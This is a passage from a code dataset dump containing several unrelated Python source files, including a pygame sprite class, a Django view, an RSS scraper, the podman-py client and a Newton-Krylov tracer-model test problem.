= None\n\n def init(self, screen, image, x, y):\n \"\"\"Set the entity attributes, and print it in the game display\"\"\"\n self._sprite = pygame.sprite.Sprite()\n surface = pygame.image.load(image).convert()\n self._surface = surface\n surface.set_colorkey(pygame.Color(255,0,255,0))\n\n #self.create_image(surface)\n\n self._sprite.image = surface.subsurface((0,0, 23, 23))\n self._next_image = surface.subsurface((23,0, 23, 23))\n\n self._sprite.rect = self._sprite.image.get_rect()\n self._screen = screen\n self._sprite.rect.topleft = [x, y]\n self._x = x\n self._y = y\n\n\n def update(self):\n \"\"\"Switch to the next picture for the animation\"\"\"\n tmp_image = self._sprite.image\n self._sprite.image = self._next_image\n self._next_image = tmp_image\n\n self._sprite.rect = self._sprite.image.get_rect()\n self._sprite.rect.topleft = [self._x, self._y]\n\n self._screen.blit(self._sprite.image, self._sprite.rect)\n","sub_path":"src/gui/entity.py","file_name":"entity.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"231417324","text":"from ..enums import MonitorStatus\nfrom ..filters import FilterByOrder\nfrom django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\nfrom saef.models import ApplicationSessionMetaData, JobSessionMetaData\nfrom django.core.exceptions import ObjectDoesNotExist\n\n@login_required()\ndef application_detail(request, session_pk):\n data = {}\n \n try:\n data['metadata'] = ApplicationSessionMetaData.objects.filter(pk=session_pk).first()\n recent_application_sessions_metadata = ApplicationSessionMetaData.objects\\\n .filter(application_session__application=data['metadata'].application_session.application)\\\n .order_by('-pk')[:10]\n \n job_sessions_metadata = JobSessionMetaData.objects\\\n .filter(job_session__application_session__pk=data['metadata'].application_session.pk)\n \n filter_order_by = FilterByOrder(request, 'job')\n job_sessions_metadata = filter_order_by.filter(job_sessions_metadata)\n \n succeeded_jobs = sum(map(lambda job :job.status_type == MonitorStatus.SUCCEEDED.value, job_sessions_metadata))\n total_jobs = job_sessions_metadata.count()\n \n data['recent_application_sessions_metadata'] = recent_application_sessions_metadata\n data['job_sessions_metadata'] = job_sessions_metadata\n data['total_jobs'] = total_jobs\n data['succeeded_jobs'] = succeeded_jobs\n \n return render(request, 'application_overview/application_detail.html', data)\n except AttributeError:\n return render(request, 'application_overview/application_detail.html', data)\n except ObjectDoesNotExist:\n return render(request, 'application_overview/application_detail.html', data)\n ","sub_path":"saefportal/saef/views/application_detail_view.py","file_name":"application_detail_view.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"526600955","text":"\"\"\"\nThis script takes online books url of rss feed as input. Then creates an .xml file and \nprocesses the .xml file to return json file that contains Title, Year, and Author of book information\n\"\"\"\n# importing the required modules\n\nimport json\nimport requests\nimport xml.etree.ElementTree as ET\n\ndef loadRSS():\n\n # url of rss feed\n url = 'https://onlinebooks.library.upenn.edu/newrss.xml'\n\n # creating HTTP response object from given url\n resp = requests.get(url)\n\n # saving the xml file\n with open('onlinebooks.xml', 'wb') as f:\n f.write(resp.content)\n\n\ndef parseXML(xmlfile):\n\n # create element tree object\n tree = ET.parse(xmlfile)\n\n # get root element\n root = tree.getroot()\n\n # create empty list for book items\n bookitems = []\n\n # iterate book item\n for item in root.findall('./channel/item'):\n\n for child in item:\n if child.tag == 'description':\n\n # append description to list of items\n bookitems.append(child.text)\n return bookitems\n\n\n\n\n\ndef main():\n #url=argv[1]\n # load rss from web to update existing xml file\n loadRSS()\n\n # parse xml file\n bookitems = parseXML('onlinebooks.xml')\n book={}\n for item in bookitems:\n line=item.split(\"(\")\n title=line[0]\n rest=line[1]\n year_author=rest.split(\")\")\n year_publisher=year_author[0]\n year_published=year_publisher.split(\" \")\n year=year_published[len(year_published)-1]\n if len(year)>4:\n year=year.replace('c','')\n author=year_author[1]\n author=author.replace(\", by \",'')\n if year.isdigit():\n\n book[\"Title\"] = title\n book[\"Year\"] = year\n book[\"Author\"]=author\n\n print(json.dumps(book))\n \nif __name__ == \"__main__\":\n\n main()\n","sub_path":"read_rss.py","file_name":"read_rss.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"340242324","text":"import os\nfrom collections import defaultdict\n\nfrom sequana.fasta_gff_correction import FastaGFFCorrection\n\nfrom . import test_dir\n\n\ndef test_fasta_gff_correction(tmpdir):\n # test with a custom fasta\n in_fasta = f\"{test_dir}/data/fasta_gff_correction/test.fa\"\n in_gff = f\"{test_dir}/data/fasta_gff_correction/test.gff3\"\n in_vcf = f\"{test_dir}/data/fasta_gff_correction/test.vcf\"\n\n\n out_fasta = tmpdir.join('test.fa')\n out_gff = tmpdir.join('test.gff3')\n\n f = FastaGFFCorrection(in_fasta, in_vcf)\n f.fix_and_save_fasta(out_fasta)\n f.fix_and_save_gff(in_gff, out_fasta, out_gff)\n\n # we can read the output gff and output sequence back and count the stop/start codons\n\n assert f.get_all_start_codons(out_fasta, out_gff, \"AE000666_1\", strand=\"+\") ==\\\n defaultdict(int, {'ATG': 50, 'TTG': 17, 'GTG': 13})\n\n assert f.get_all_stop_codons(out_fasta, out_gff, \"AE000666_1\", strand=\"+\")==\\\n defaultdict(int, {'TGA': 29, 'TAA': 31, 'TAG': 20})\n\n assert f.get_all_start_codons(out_fasta, out_gff, \"AE000666_1\", strand=\"-\")==\\\n defaultdict(int, {'CAT': 43, 'CAC': 9, 'CAA': 12})\n\n assert f.get_all_stop_codons(out_fasta, out_gff, \"AE000666_1\", strand=\"-\")==\\\n defaultdict(int, {'TTA': 35, 'TCA': 17, 'CTA': 12})\n","sub_path":"test/test_fasta_gff_correction.py","file_name":"test_fasta_gff_correction.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"125434028","text":"#!/usr/bin/python\n\nimport sys\nimport time, math, random, threading, glob, os\n\n#import pygame\nimport subprocess as sp\nfrom os import environ\n\n\nimport Adafruit_MPR121.MPR121 as MPR121\n\n\ncap = MPR121.MPR121()\n\n\nif not cap.begin():\n print ('Error: Did you forget to sudo? If no, Must Reboot')\n sys.exit(1)\n\nenv =environ.copy()\nenv['AUDIODEV'] = 'front:CARD=Device,DEV=0'\n\n#pygame.init()\n#pygame.mixer.init()\n#pygame.mixer.set_num_channels(1)\n#sfx = pygame.mixer.Channel(0)\n\nsfxFiles = glob.glob(\"audio/*.wav\") #Sorry, not including the audio on github\nnSFX = len(sfxFiles)\nlast = random.randrange(0, (nSFX-1))\ntext = sfxFiles[last]\n#while (pygame.mixer.get_init() == None):\n# print('waiting')\n# time.sleep(0.2)\n#text = pygame.mixer.music.load(sfxFiles[nextt])\n#print(nSFX, text, sfxFiles)\n\ndef touch ():\n if not os.path.exists('/tmp/sexbot2'):\n open('/tmp/sexbot2', 'a').close() \n return\n\ntouch()\ncount = 0\nshould_touch = 600 # once per minute\n\n\nlast_touched = cap.is_touched(1) or cap.is_touched(2)\nwhile True:\n current_touched = cap.is_touched(1) or cap.is_touched(2)\n #pygame.event.pump()\n #pin_bit = 1 << 1\n # First check if transitioned from not touched to touched.\n if current_touched and (not last_touched):\n #print '{0} touched!'.format(i)\n #if( not sfx.get_busy()):\n # time.sleep(0.4)\n #sfx.play(text)\n #text.play()\n # print(sfxFiles[nextt])\n # pygame.mixer.music.load(sfxFiles[nextt])\n # pygame.mixer.music.play()\n #print(text.get_volume())\n # nextt = last\n # while ((nSFX > 1) and (nextt != last)):\n # nextt = random.randrange(0, (nSFX-1))\n #text = pygame.mixer.Sound(sfxFiles[nextt])\n # last = nextt\n touch()\n print(\"playing\")\n sp.call(['play', text], env=env)\n touch()\n nextt=last\n while ((nSFX > 1) and (nextt == last)):\n nextt = random.randrange(0, (nSFX-1))\n \n text = sfxFiles[nextt]\n last=nextt\n count = 0\n # Next check if transitioned from touched to not touched.\n #if not current_touched & pin_bit and last_touched & pin_bit:\n #print '{0} released!'.format(i)\n # Update last state and wait a short period before repeating.\n last_touched = current_touched\n \n count += 1\n count %= should_touch\n #print(count)\n if (count == 0):\n touch()\n\n time.sleep(0.1)\n","sub_path":"examples/Talk.py","file_name":"Talk.py","file_ext":"py","file_size_in_byte":2478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"244159740","text":"# coding: utf-8\n# author: HotDogDevBr.\n# E-mail: hotdogdevbr@gmail.com\n\"\"\"\n Escreva um programa que pergunte o depósito inicial e a taxa de\njuros de uma poupaça. Exiba os valores mês a mês para os 24 primeiros\nmeses.\n Escreva o total de ganho do juros no período.\n\"\"\"\ndeposito_inicial = float(input(\"Digite o valor inicial do deposito: \"))\ntaxa_mes = int(input(\"Digite a taxa juros mensal: \"))\ntotal = deposito_inicial\ncontado = 1\ntaxa_mes = taxa_mes / 100\n\nwhile contado <= 24:\n print(\"Mês {:<2} de 24, valor adicionado {:.2f}\".format(\n contado, total * taxa_mes))\n total = total + (total * taxa_mes)\n contado += 1\n\nprint(\"Valor Inicial foi R$ {:.2f}\".format(deposito_inicial))\nprint(\"Valor do juros por mes foi {:.0f}%\".format(taxa_mes * 100))\nprint(\"Valor final foi R$ {:.2f}\".format(total))\n","sub_path":"Exercicios Livro Python/capitulo 5/exercicio 5.11.py","file_name":"exercicio 5.11.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"64617887","text":"\"\"\"Client for connecting to Podman service.\"\"\"\nimport logging\nimport os\nimport ssl\nfrom contextlib import AbstractContextManager\nfrom typing import Any, Dict, Mapping, Optional, Union\n\nfrom podman.api.client import APIClient\nfrom podman.domain.containers_manager import ContainersManager\nfrom podman.domain.events import EventsManager\nfrom podman.domain.images_manager import ImagesManager\nfrom podman.domain.manifests import ManifestsManager\nfrom podman.domain.networks_manager import NetworksManager\nfrom podman.domain.pods_manager import PodsManager\nfrom podman.domain.secrets import SecretsManager\nfrom podman.domain.system import SystemManager\nfrom podman.domain.volumes import VolumesManager\nfrom podman.tlsconfig import TLSConfig\n\nlogger = logging.getLogger(\"podman\")\n\n\nclass PodmanClient(AbstractContextManager):\n \"\"\"Create client connection to Podman service\"\"\"\n\n def __init__(\n self,\n base_url: str = None,\n version: str = None,\n timeout: int = 60,\n tls: Union[bool, TLSConfig] = False,\n user_agent: str = None,\n credstore_env: Optional[Mapping[str, str]] = None,\n use_ssh_client: bool = False,\n max_pool_size: int = 5,\n ) -> None:\n \"\"\"Instantiate PodmanClient object\n\n Args:\n base_url: URL to Podman service.\n version: API version to use. Default: auto, use version from server\n timeout: Timeout for API calls, in seconds. Default: 60\n tls: Enable TLS connection to service. True uses default options which\n may be overridden using a TLSConfig object\n user_agent: User agent for service connections. Default: PodmanPy/\n credstore_env: Dict containing environment for credential store\n use_ssh_client: Use system ssh agent rather than ssh module. Default:False\n max_pool_size: Number of connections to save in pool\n \"\"\"\n if not base_url:\n uid = os.geteuid()\n if uid == 0:\n elements = [\"http+unix://\", \"run\", \"podman\", \"podman.sock\"]\n else:\n elements = [\"http+unix://\", \"run\", \"user\", str(uid), \"podman\", \"podman.sock\"]\n base_url = \"%2F\".join(elements)\n self.base_url = base_url\n\n _ = use_ssh_client\n\n self.api = APIClient(\n base_url=base_url,\n version=version,\n timeout=timeout,\n tls=tls,\n user_agent=user_agent,\n num_pools=max_pool_size,\n credstore_env=credstore_env,\n )\n\n def __enter__(self) -> \"PodmanClient\":\n return self\n\n def __exit__(self, exc_type, exc_value, traceback) -> None:\n self.close()\n\n @classmethod\n def from_env(\n cls,\n version: str = \"auto\",\n timeout: int = -1,\n max_pool_size: int = 60,\n ssl_version: int = None,\n assert_hostname: bool = False,\n environment: dict = None,\n credstore_env: dict = None,\n use_ssh_client: bool = False,\n ) -> \"PodmanClient\":\n \"\"\"Returns connection to service using environment variables and parameters.\n\n Environment variables:\n DOCKER_HOST, CONTAINER_HOST: URL to Podman service\n DOCKER_TLS_VERIFY, CONTAINER_TLS_VERIFY: Verify host against CA certificate\n DOCKER_CERT_PATH, CONTAINER_CERT_PATH: Path to TLS certificates for host connection\n\n Args:\n version: API version to use. Default: auto, use version from server\n timeout: Timeout for API calls, in seconds. Default: 60\n max_pool_size: Number of connections to save in pool.\n ssl_version: Valid SSL version from ssl module\n assert_hostname: Verify hostname of service\n environment: Dict containing input environment. Default: os.environ\n credstore_env: Dict containing environment for credential store\n use_ssh_client: Use system ssh agent rather than ssh module. Default:False\n\n Returns:\n PodmanClient: used to communicate with Podman service\n \"\"\"\n # FIXME Should parameters be *args, **kwargs and resolved before calling PodmanClient()?\n\n env = os.environ\n if environment is not None:\n env = environment\n\n if credstore_env is None:\n credstore_env = {}\n\n if version == \"auto\":\n version = None\n\n tls = False\n tls_verify = env.get(\"CONTAINER_TLS_VERIFY\") or env.get(\"DOCKER_TLS_VERIFY\")\n if tls_verify or ssl_version or assert_hostname:\n cert_path = (\n env.get(\"CONTAINER_CERT_PATH\")\n or env.get(\"DOCKER_CERT_PATH\")\n or os.path.join(os.path.expanduser(\"~\"), \".config/containers/certs.d\")\n )\n\n tls = TLSConfig(\n client_cert=(\n os.path.join(cert_path, \"cert.pem\"),\n os.path.join(cert_path, \"key.pem\"),\n ),\n ca_cert=os.path.join(cert_path, \"ca.pem\"),\n verify=tls_verify,\n ssl_version=ssl_version or ssl.PROTOCOL_TLSv1_2,\n assert_hostname=assert_hostname,\n )\n\n host = env.get(\"CONTAINER_HOST\") or env.get(\"DOCKER_HOST\") or None\n\n return PodmanClient(\n base_url=host,\n version=version,\n timeout=timeout,\n tls=tls,\n credstore_env=credstore_env,\n use_ssh_client=use_ssh_client,\n max_pool_size=max_pool_size,\n )\n\n @property\n def configs(self):\n \"\"\"Swarm not supported.\n\n Raises:\n NotImplemented:\n \"\"\"\n raise NotImplementedError(\"Swarm not supported.\")\n\n @property\n def containers(self) -> ContainersManager:\n \"\"\"Returns object for managing containers running via the Podman service.\"\"\"\n return ContainersManager(client=self.api)\n\n @property\n def images(self) -> ImagesManager:\n \"\"\"Returns object for managing images stored via the Podman service.\"\"\"\n return ImagesManager(client=self.api)\n\n @property\n def manifests(self) -> ManifestsManager:\n \"\"\"Returns object for managing manifests via the Podman service.\"\"\"\n return ManifestsManager(client=self.api)\n\n @property\n def networks(self) -> NetworksManager:\n \"\"\"Returns object for managing networks created via the Podman service.\"\"\"\n return NetworksManager(client=self.api)\n\n @property\n def volumes(self) -> VolumesManager:\n \"\"\"Returns object for managing volumes maintained via the Podman service.\"\"\"\n return VolumesManager(client=self.api)\n\n @property\n def pods(self) -> PodsManager:\n \"\"\"Returns object for managing pods created via the Podman service.\"\"\"\n return PodsManager(client=self.api)\n\n @property\n def nodes(self):\n \"\"\"Swarm not supported.\n\n Raises:\n NotImplemented:\n \"\"\"\n raise NotImplementedError(\"Swarm not supported.\")\n\n @property\n def secrets(self):\n \"\"\"TBD.\"\"\"\n return SecretsManager(client=self.api)\n\n @property\n def services(self):\n \"\"\"Swarm not supported.\n\n Raises:\n NotImplemented:\n \"\"\"\n raise NotImplementedError(\"Swarm not supported.\")\n\n @property\n def swarm(self):\n \"\"\"Swarm not supported.\n\n Raises:\n NotImplemented:\n \"\"\"\n raise NotImplementedError(\"Swarm not supported.\")\n\n def df(self) -> Dict[str, Any]: # pylint: disable=missing-function-docstring,invalid-name\n return SystemManager(client=self.api).df()\n\n df.__doc__ = SystemManager.df.__doc__\n\n def events(self, *args, **kwargs): # pylint: disable=missing-function-docstring\n return EventsManager(client=self.api).list(*args, **kwargs)\n\n events.__doc__ = EventsManager.list.__doc__\n\n def info(self, *args, **kwargs): # pylint: disable=missing-function-docstring\n return SystemManager(client=self.api).info(*args, **kwargs)\n\n info.__doc__ = SystemManager.info.__doc__\n\n def login(self, *args, **kwargs): # pylint: disable=missing-function-docstring\n return SystemManager(client=self.api).login(*args, **kwargs)\n\n login.__doc__ = SystemManager.login.__doc__\n\n def ping(self) -> bool: # pylint: disable=missing-function-docstring\n return SystemManager(client=self.api).ping()\n\n ping.__doc__ = SystemManager.ping.__doc__\n\n def version(self, *args, **kwargs): # pylint: disable=missing-function-docstring\n _ = args\n return SystemManager(client=self.api).version(**kwargs)\n\n version.__doc__ = SystemManager.version.__doc__\n\n def close(self): # ppylint: disable=missing-function-docstring\n \"\"\"Close connection to service.\"\"\"\n return self.api.close()\n\n close.__doc__ = APIClient.close.__doc__\n\n\nDockerClient = PodmanClient\nfrom_env = PodmanClient.from_env\n","sub_path":"podman/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":8974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"419602453","text":"import cv2\nimport numpy as np\n\n# \nstart = cv2.getTickCount()\n\nimg = cv2.imread('iha.jpg')\nres = np.uint8(np.clip((0.8 * img + 80), 0, 255))\n\nend = cv2.getTickCount()\n\nprint((end - start) / cv2.getTickFrequency())\n","sub_path":"01-Introduction-and-Installation/cv2_contrast_brightness_time.py","file_name":"cv2_contrast_brightness_time.py","file_ext":"py","file_size_in_byte":213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"18293995","text":"\nfrom tkinter import filedialog# python3 #import tkFileDialog #python 2.7\n\nimport pandas as pd\n\nclass Summary_Experimental_Cycles(object):\n '''\n Summary_Experimental_Cycles stellt methoden zur zusammenfassung der \n ergebnisse aller geladenen Datensätze zusammen\n '''\n\n\n def __init__(self, data_to_be_summarized):\n self.data_list = data_to_be_summarized\n # Auswertungsrelevante parameter sollen für alle \n # verwendeten parameter identisch sein\n \n self.TimeWindowSize = 0.8\n self.IntervallShiftFraction = 0.5\n self.AmplitudeFraction = 0.7\n self.Smooth = 1\n self.FreqRange = (20,60)\n\n \n def surface_tension_summary(self):\n surface_tension_summary = pd.concat(\n [pd.melt(\n self.add_description_colmns(\n data.calc_st_results_vs_time(),\n data.data_id_string),\n id_vars=['time', 'Temp','data'],\n value_name='surface-tension[Nm]'\n )\n \n for data in self.data_list\n ]\n )\n print(surface_tension_summary)\n \n # store results\n file_fqn = filedialog.asksaveasfilename(\n title = \"save surface-tension data as for all loaded datasets\",\n initialdir = '/home/stephan/workspace/Projekt_Metalllegierungsschmelzen/Daten/ISS/LEK94',\n defaultextension = '.csv',\n filetypes=[(\"csv file\", \"*.csv\")],\n initialfile=\"alloy_?_surface_tension_results.csv\"\n )\n surface_tension_summary.to_csv(file_fqn, encoding='utf-8')\n \n \n def viscosity_summary(self):\n \n viscosity_summary = pd.concat(\n [self.add_description_colmns(data.calc_viscosity_vs_time()['viscosity_data'], \n data.data_id_string) \n for data in self.data_list\n ]\n )\n print(viscosity_summary)\n \n file_fqn = filedialog.asksaveasfilename(\n title = \"save viscosity data for all loaded datasets\",\n initialdir = '/home/stephan/workspace/Projekt_Metalllegierungsschmelzen/Daten/ISS/LEK94',\n defaultextension = '.csv',\n filetypes=[(\"csv file\", \"*.csv\")],\n initialfile=\"alloy_?_viscosity_results.csv\"\n )\n\n viscosity_summary.to_csv(file_fqn, encoding='utf-8')\n \n # utility functions\n def add_description_colmns(self, data, description):\n data.loc[:, 'data'] = description\n return(data)","sub_path":"src/model/summary_experimental_cycles.py","file_name":"summary_experimental_cycles.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"168453869","text":"#!/usr/bin/env python\n\"\"\"test problem for Newton-Krylov solver\"\"\"\n\nimport argparse\nimport configparser\nimport logging\nimport os\nimport subprocess\nimport sys\n\nimport numpy as np\nfrom scipy.linalg import solve_banded, svd\nfrom scipy.sparse import diags\nfrom scipy.sparse.linalg import spsolve\nfrom scipy.integrate import solve_ivp\n\nfrom netCDF4 import Dataset\n\nfrom model import ModelStateBase, TracerModuleStateBase\nfrom model_config import ModelConfig, get_modelinfo\nfrom newton_fcn_base import NewtonFcnBase\nfrom solver import SolverState\n\ndef _parse_args():\n \"\"\"parse command line arguments\"\"\"\n parser = argparse.ArgumentParser(description=\"test problem for Newton-Krylov solver\")\n parser.add_argument(\n 'cmd', choices=['comp_fcn', 'gen_precond_jacobian', 'apply_precond_jacobian'],\n help='command to run')\n parser.add_argument(\n '--cfg_fname', help='name of configuration file', default='newton_krylov.cfg')\n parser.add_argument(\n '--workdir', help='directory that filename are relative to', default='.')\n parser.add_argument('--hist_fname', help='name of history file', default=None)\n parser.add_argument('--precond_fname', help='name of precond file', default=None)\n parser.add_argument('--in_fname', help='name of file with input')\n parser.add_argument('--res_fname', help='name of file for result')\n return parser.parse_args()\n\ndef main(args):\n \"\"\"test problem for Newton-Krylov solver\"\"\"\n\n config = configparser.ConfigParser()\n config.read(args.cfg_fname)\n solverinfo = config['solverinfo']\n\n logging_format = '%(asctime)s:%(process)s:%(filename)s:%(funcName)s:%(message)s'\n logging.basicConfig(\n stream=sys.stdout, format=logging_format, level=solverinfo['logging_level'])\n logger = logging.getLogger(__name__)\n\n logger.info('args.cmd=\"%s\"', args.cmd)\n\n # store cfg_fname in modelinfo, to ease access to its value elsewhere\n config['modelinfo']['cfg_fname'] = args.cfg_fname\n\n ModelConfig(config['modelinfo'])\n\n newton_fcn = NewtonFcn()\n\n solver_state = SolverState('newton_fcn_test_problem', args.workdir)\n\n ms_in = ModelState(os.path.join(args.workdir, args.in_fname))\n if args.cmd == 'comp_fcn':\n newton_fcn.comp_fcn(\n ms_in, os.path.join(args.workdir, args.res_fname), None,\n os.path.join(args.workdir, args.hist_fname))\n elif args.cmd == 'gen_precond_jacobian':\n newton_fcn.gen_precond_jacobian(\n ms_in, os.path.join(args.workdir, args.hist_fname),\n os.path.join(args.workdir, args.precond_fname), solver_state)\n elif args.cmd == 'apply_precond_jacobian':\n newton_fcn.apply_precond_jacobian(\n ms_in, os.path.join(args.workdir, args.precond_fname),\n os.path.join(args.workdir, args.res_fname), solver_state)\n else:\n msg = 'unknown cmd=%s' % args.cmd\n raise ValueError(msg)\n\n logger.info('done')\n\n################################################################################\n\nclass ModelState(ModelStateBase):\n \"\"\"class for representing the state space of a model\"\"\"\n\n # give ModelState operators higher priority than those of numpy\n __array_priority__ = 100\n\n def __init__(self, vals_fname=None):\n logger = logging.getLogger(__name__)\n logger.debug('ModelState, vals_fname=\"%s\"', vals_fname)\n super().__init__(TracerModuleState, vals_fname)\n\n################################################################################\n\nclass TracerModuleState(TracerModuleStateBase):\n \"\"\"\n Derived class for representing a collection of model tracers.\n It implements _read_vals and dump.\n \"\"\"\n\n def _read_vals(self, tracer_module_name, vals_fname):\n \"\"\"return tracer values and dimension names and lengths, read from vals_fname)\"\"\"\n logger = logging.getLogger(__name__)\n logger.debug(\n 'tracer_module_name=\"%s\", vals_fname=\"%s\"', tracer_module_name, vals_fname)\n dims = {}\n with Dataset(vals_fname, mode='r') as fptr:\n fptr.set_auto_mask(False)\n # get dims from first variable\n dimnames0 = fptr.variables[self.tracer_names()[0]].dimensions\n for dimname in dimnames0:\n dims[dimname] = fptr.dimensions[dimname].size\n # all tracers are stored in a single array\n # tracer index is the leading index\n vals = np.empty((self.tracer_cnt(),) + tuple(dims.values()))\n # check that all vars have the same dimensions\n for tracer_name in self.tracer_names():\n if fptr.variables[tracer_name].dimensions != dimnames0:\n msg = 'not all vars have same dimensions' \\\n ', tracer_module_name=%s, vals_fname=%s' \\\n % (tracer_module_name, vals_fname)\n raise ValueError(msg)\n # read values\n if len(dims) > 3:\n msg = 'ndim too large (for implementation of dot_prod)' \\\n 'tracer_module_name=%s, vals_fname=%s, ndim=%s' \\\n % (tracer_module_name, vals_fname, len(dims))\n raise ValueError(msg)\n for tracer_ind, tracer_name in enumerate(self.tracer_names()):\n varid = fptr.variables[tracer_name]\n vals[tracer_ind, :] = varid[:]\n return vals, dims\n\n def dump(self, fptr, action):\n \"\"\"\n perform an action (define or write) of dumping a TracerModuleState object\n to an open file\n \"\"\"\n if action == 'define':\n for dimname, dimlen in self._dims.items():\n try:\n if fptr.dimensions[dimname].size != dimlen:\n msg = 'dimname already exists and has wrong size' \\\n 'tracer_module_name=%s, dimname=%s' \\\n % (self._tracer_module_name, dimname)\n raise ValueError(msg)\n except KeyError:\n fptr.createDimension(dimname, dimlen)\n dimnames = tuple(self._dims.keys())\n # define all tracers\n for tracer_name in self.tracer_names():\n fptr.createVariable(tracer_name, 'f8', dimensions=dimnames)\n elif action == 'write':\n # write all tracers\n for tracer_ind, tracer_name in enumerate(self.tracer_names()):\n fptr.variables[tracer_name][:] = self._vals[tracer_ind, :]\n else:\n msg = 'unknown action=%s', action\n raise ValueError(msg)\n return self\n\n################################################################################\n\nclass NewtonFcn(NewtonFcnBase):\n \"\"\"class of methods related to problem being solved with Newton's method\"\"\"\n def __init__(self):\n self.time_range = (0.0, 365.0)\n self.depth = Depth('grid_files/depth_axis_test.nc')\n\n # tracer_module_names and tracer_names will be stored in the following attributes,\n # enabling access to them from inside _comp_tend\n self._tracer_module_names = None\n self._tracer_names = None\n\n def model_state_obj(self, fname=None):\n \"\"\"return a ModelState object compatible with this function\"\"\"\n return ModelState(fname)\n\n def comp_fcn(self, ms_in, res_fname, solver_state, hist_fname=None):\n \"\"\"evalute function being solved with Newton's method\"\"\"\n logger = logging.getLogger(__name__)\n logger.debug('res_fname=\"%s\", hist_fname=\"%s\"', res_fname, hist_fname)\n\n if solver_state is not None:\n fcn_complete_step = 'comp_fcn complete for %s' % res_fname\n if solver_state.step_logged(fcn_complete_step):\n logger.debug('\"%s\" logged, returning result', fcn_complete_step)\n return ModelState(res_fname)\n logger.debug('\"%s\" not logged, proceeding', fcn_complete_step)\n\n self._tracer_module_names = ms_in.tracer_module_names\n self._tracer_names = ms_in.tracer_names()\n tracer_vals_init = np.empty((len(self._tracer_names), self.depth.axis.nlevs))\n for tracer_ind, tracer_name in enumerate(self._tracer_names):\n tracer_vals_init[tracer_ind, :] = ms_in.get_tracer_vals(tracer_name)\n\n # solve ODEs, using scipy.integrate\n # get dense output, if requested\n t_eval = np.linspace(\n self.time_range[0], self.time_range[1],\n 101 if hist_fname is not None else 2)\n sol = solve_ivp(\n self._comp_tend, self.time_range, tracer_vals_init.reshape(-1), 'Radau',\n t_eval, atol=1.0e-10, rtol=1.0e-10)\n\n if hist_fname is not None:\n self._write_hist(sol, hist_fname)\n\n ms_res = ms_in.copy()\n res_vals = sol.y[:, -1].reshape(tracer_vals_init.shape) - tracer_vals_init\n for tracer_ind, tracer_name in enumerate(self._tracer_names):\n ms_res.set_tracer_vals(tracer_name, res_vals[tracer_ind, :])\n\n self.comp_fcn_postprocess(ms_res, res_fname)\n\n if solver_state is not None:\n solver_state.log_step(fcn_complete_step)\n logger.debug('invoking resume script and exiting')\n subprocess.Popen([get_modelinfo('nk_driver_invoker_fname'), '--resume'])\n raise SystemExit\n\n return ms_res\n\n def _comp_tend(self, time, tracer_vals_flat):\n \"\"\"compute tendency function\"\"\"\n tracer_vals = tracer_vals_flat.reshape((len(self._tracer_names), -1))\n dtracer_vals_dt = np.empty_like(tracer_vals)\n for tracer_module_name in self._tracer_module_names:\n if tracer_module_name == 'iage_test':\n tracer_ind = self._tracer_names.index('iage_test')\n self._comp_tend_iage_test(\n time, tracer_vals[tracer_ind, :], dtracer_vals_dt[tracer_ind, :])\n if tracer_module_name == 'phosphorus':\n tracer_ind0 = self._tracer_names.index('po4')\n self._comp_tend_phosphorus(\n time, tracer_vals[tracer_ind0:tracer_ind0+6, :],\n dtracer_vals_dt[tracer_ind0:tracer_ind0+6, :])\n return dtracer_vals_dt.reshape(-1)\n\n def _comp_tend_iage_test(self, time, tracer_vals, dtracer_vals_dt):\n \"\"\"\n compute tendency for iage_test\n tendency units are tr_units / day\n \"\"\"\n # age 1/year\n dtracer_vals_dt[:] = (1.0 / 365.0) + self.depth.mixing_tend(time, tracer_vals)\n # restore in surface to 0 at a rate of 24.0 / day\n dtracer_vals_dt[0] = -24.0 * tracer_vals[0]\n\n def _comp_tend_phosphorus(self, time, tracer_vals, dtracer_vals_dt):\n \"\"\"\n compute tendency for phosphorus tracers\n tendency units are tr_units / day\n \"\"\"\n\n # light has e-folding decay of 25m, po4 half-saturation = 0.5\n po4 = tracer_vals[0, :]\n po4_lim = np.where(po4 > 0.0, po4 / (po4 + 0.5), 0.0)\n po4_uptake = np.exp((-1.0 / 25.0) * self.depth.axis.mid) * po4_lim\n\n self._comp_tend_phosphorus_core(\n time, po4_uptake, tracer_vals[0:3, :], dtracer_vals_dt[0:3, :])\n self._comp_tend_phosphorus_core(\n time, po4_uptake, tracer_vals[3:6, :], dtracer_vals_dt[3:6, :])\n\n # restore po4_s to po4, at a rate of 1 / day\n # compensate equally from and dop and pop,\n # so that total shadow phosphorus is conserved\n rest_term = 1.0 * (dtracer_vals_dt[0, 0] - dtracer_vals_dt[3, 0])\n dtracer_vals_dt[3, 0] += rest_term\n dtracer_vals_dt[4, 0] -= 0.67 * rest_term\n dtracer_vals_dt[5, 0] -= 0.33 * rest_term\n\n def _comp_tend_phosphorus_core(self, time, po4_uptake, tracer_vals, dtracer_vals_dt):\n \"\"\"\n core fuction for computing tendency for phosphorus tracers\n tendency units are tr_units / day\n \"\"\"\n\n po4 = tracer_vals[0, :]\n dop = tracer_vals[1, :]\n pop = tracer_vals[2, :]\n\n # dop remin rate is 1% / day\n dop_remin = np.where(dop > 0.0, 0.01 * dop, 0.0)\n # pop remin rate is 1% / day\n pop_remin = np.where(pop > 0.0, 0.01 * pop, 0.0)\n\n sigma = 0.67\n\n dtracer_vals_dt[0, :] = -po4_uptake + dop_remin + pop_remin \\\n + self.depth.mixing_tend(time, 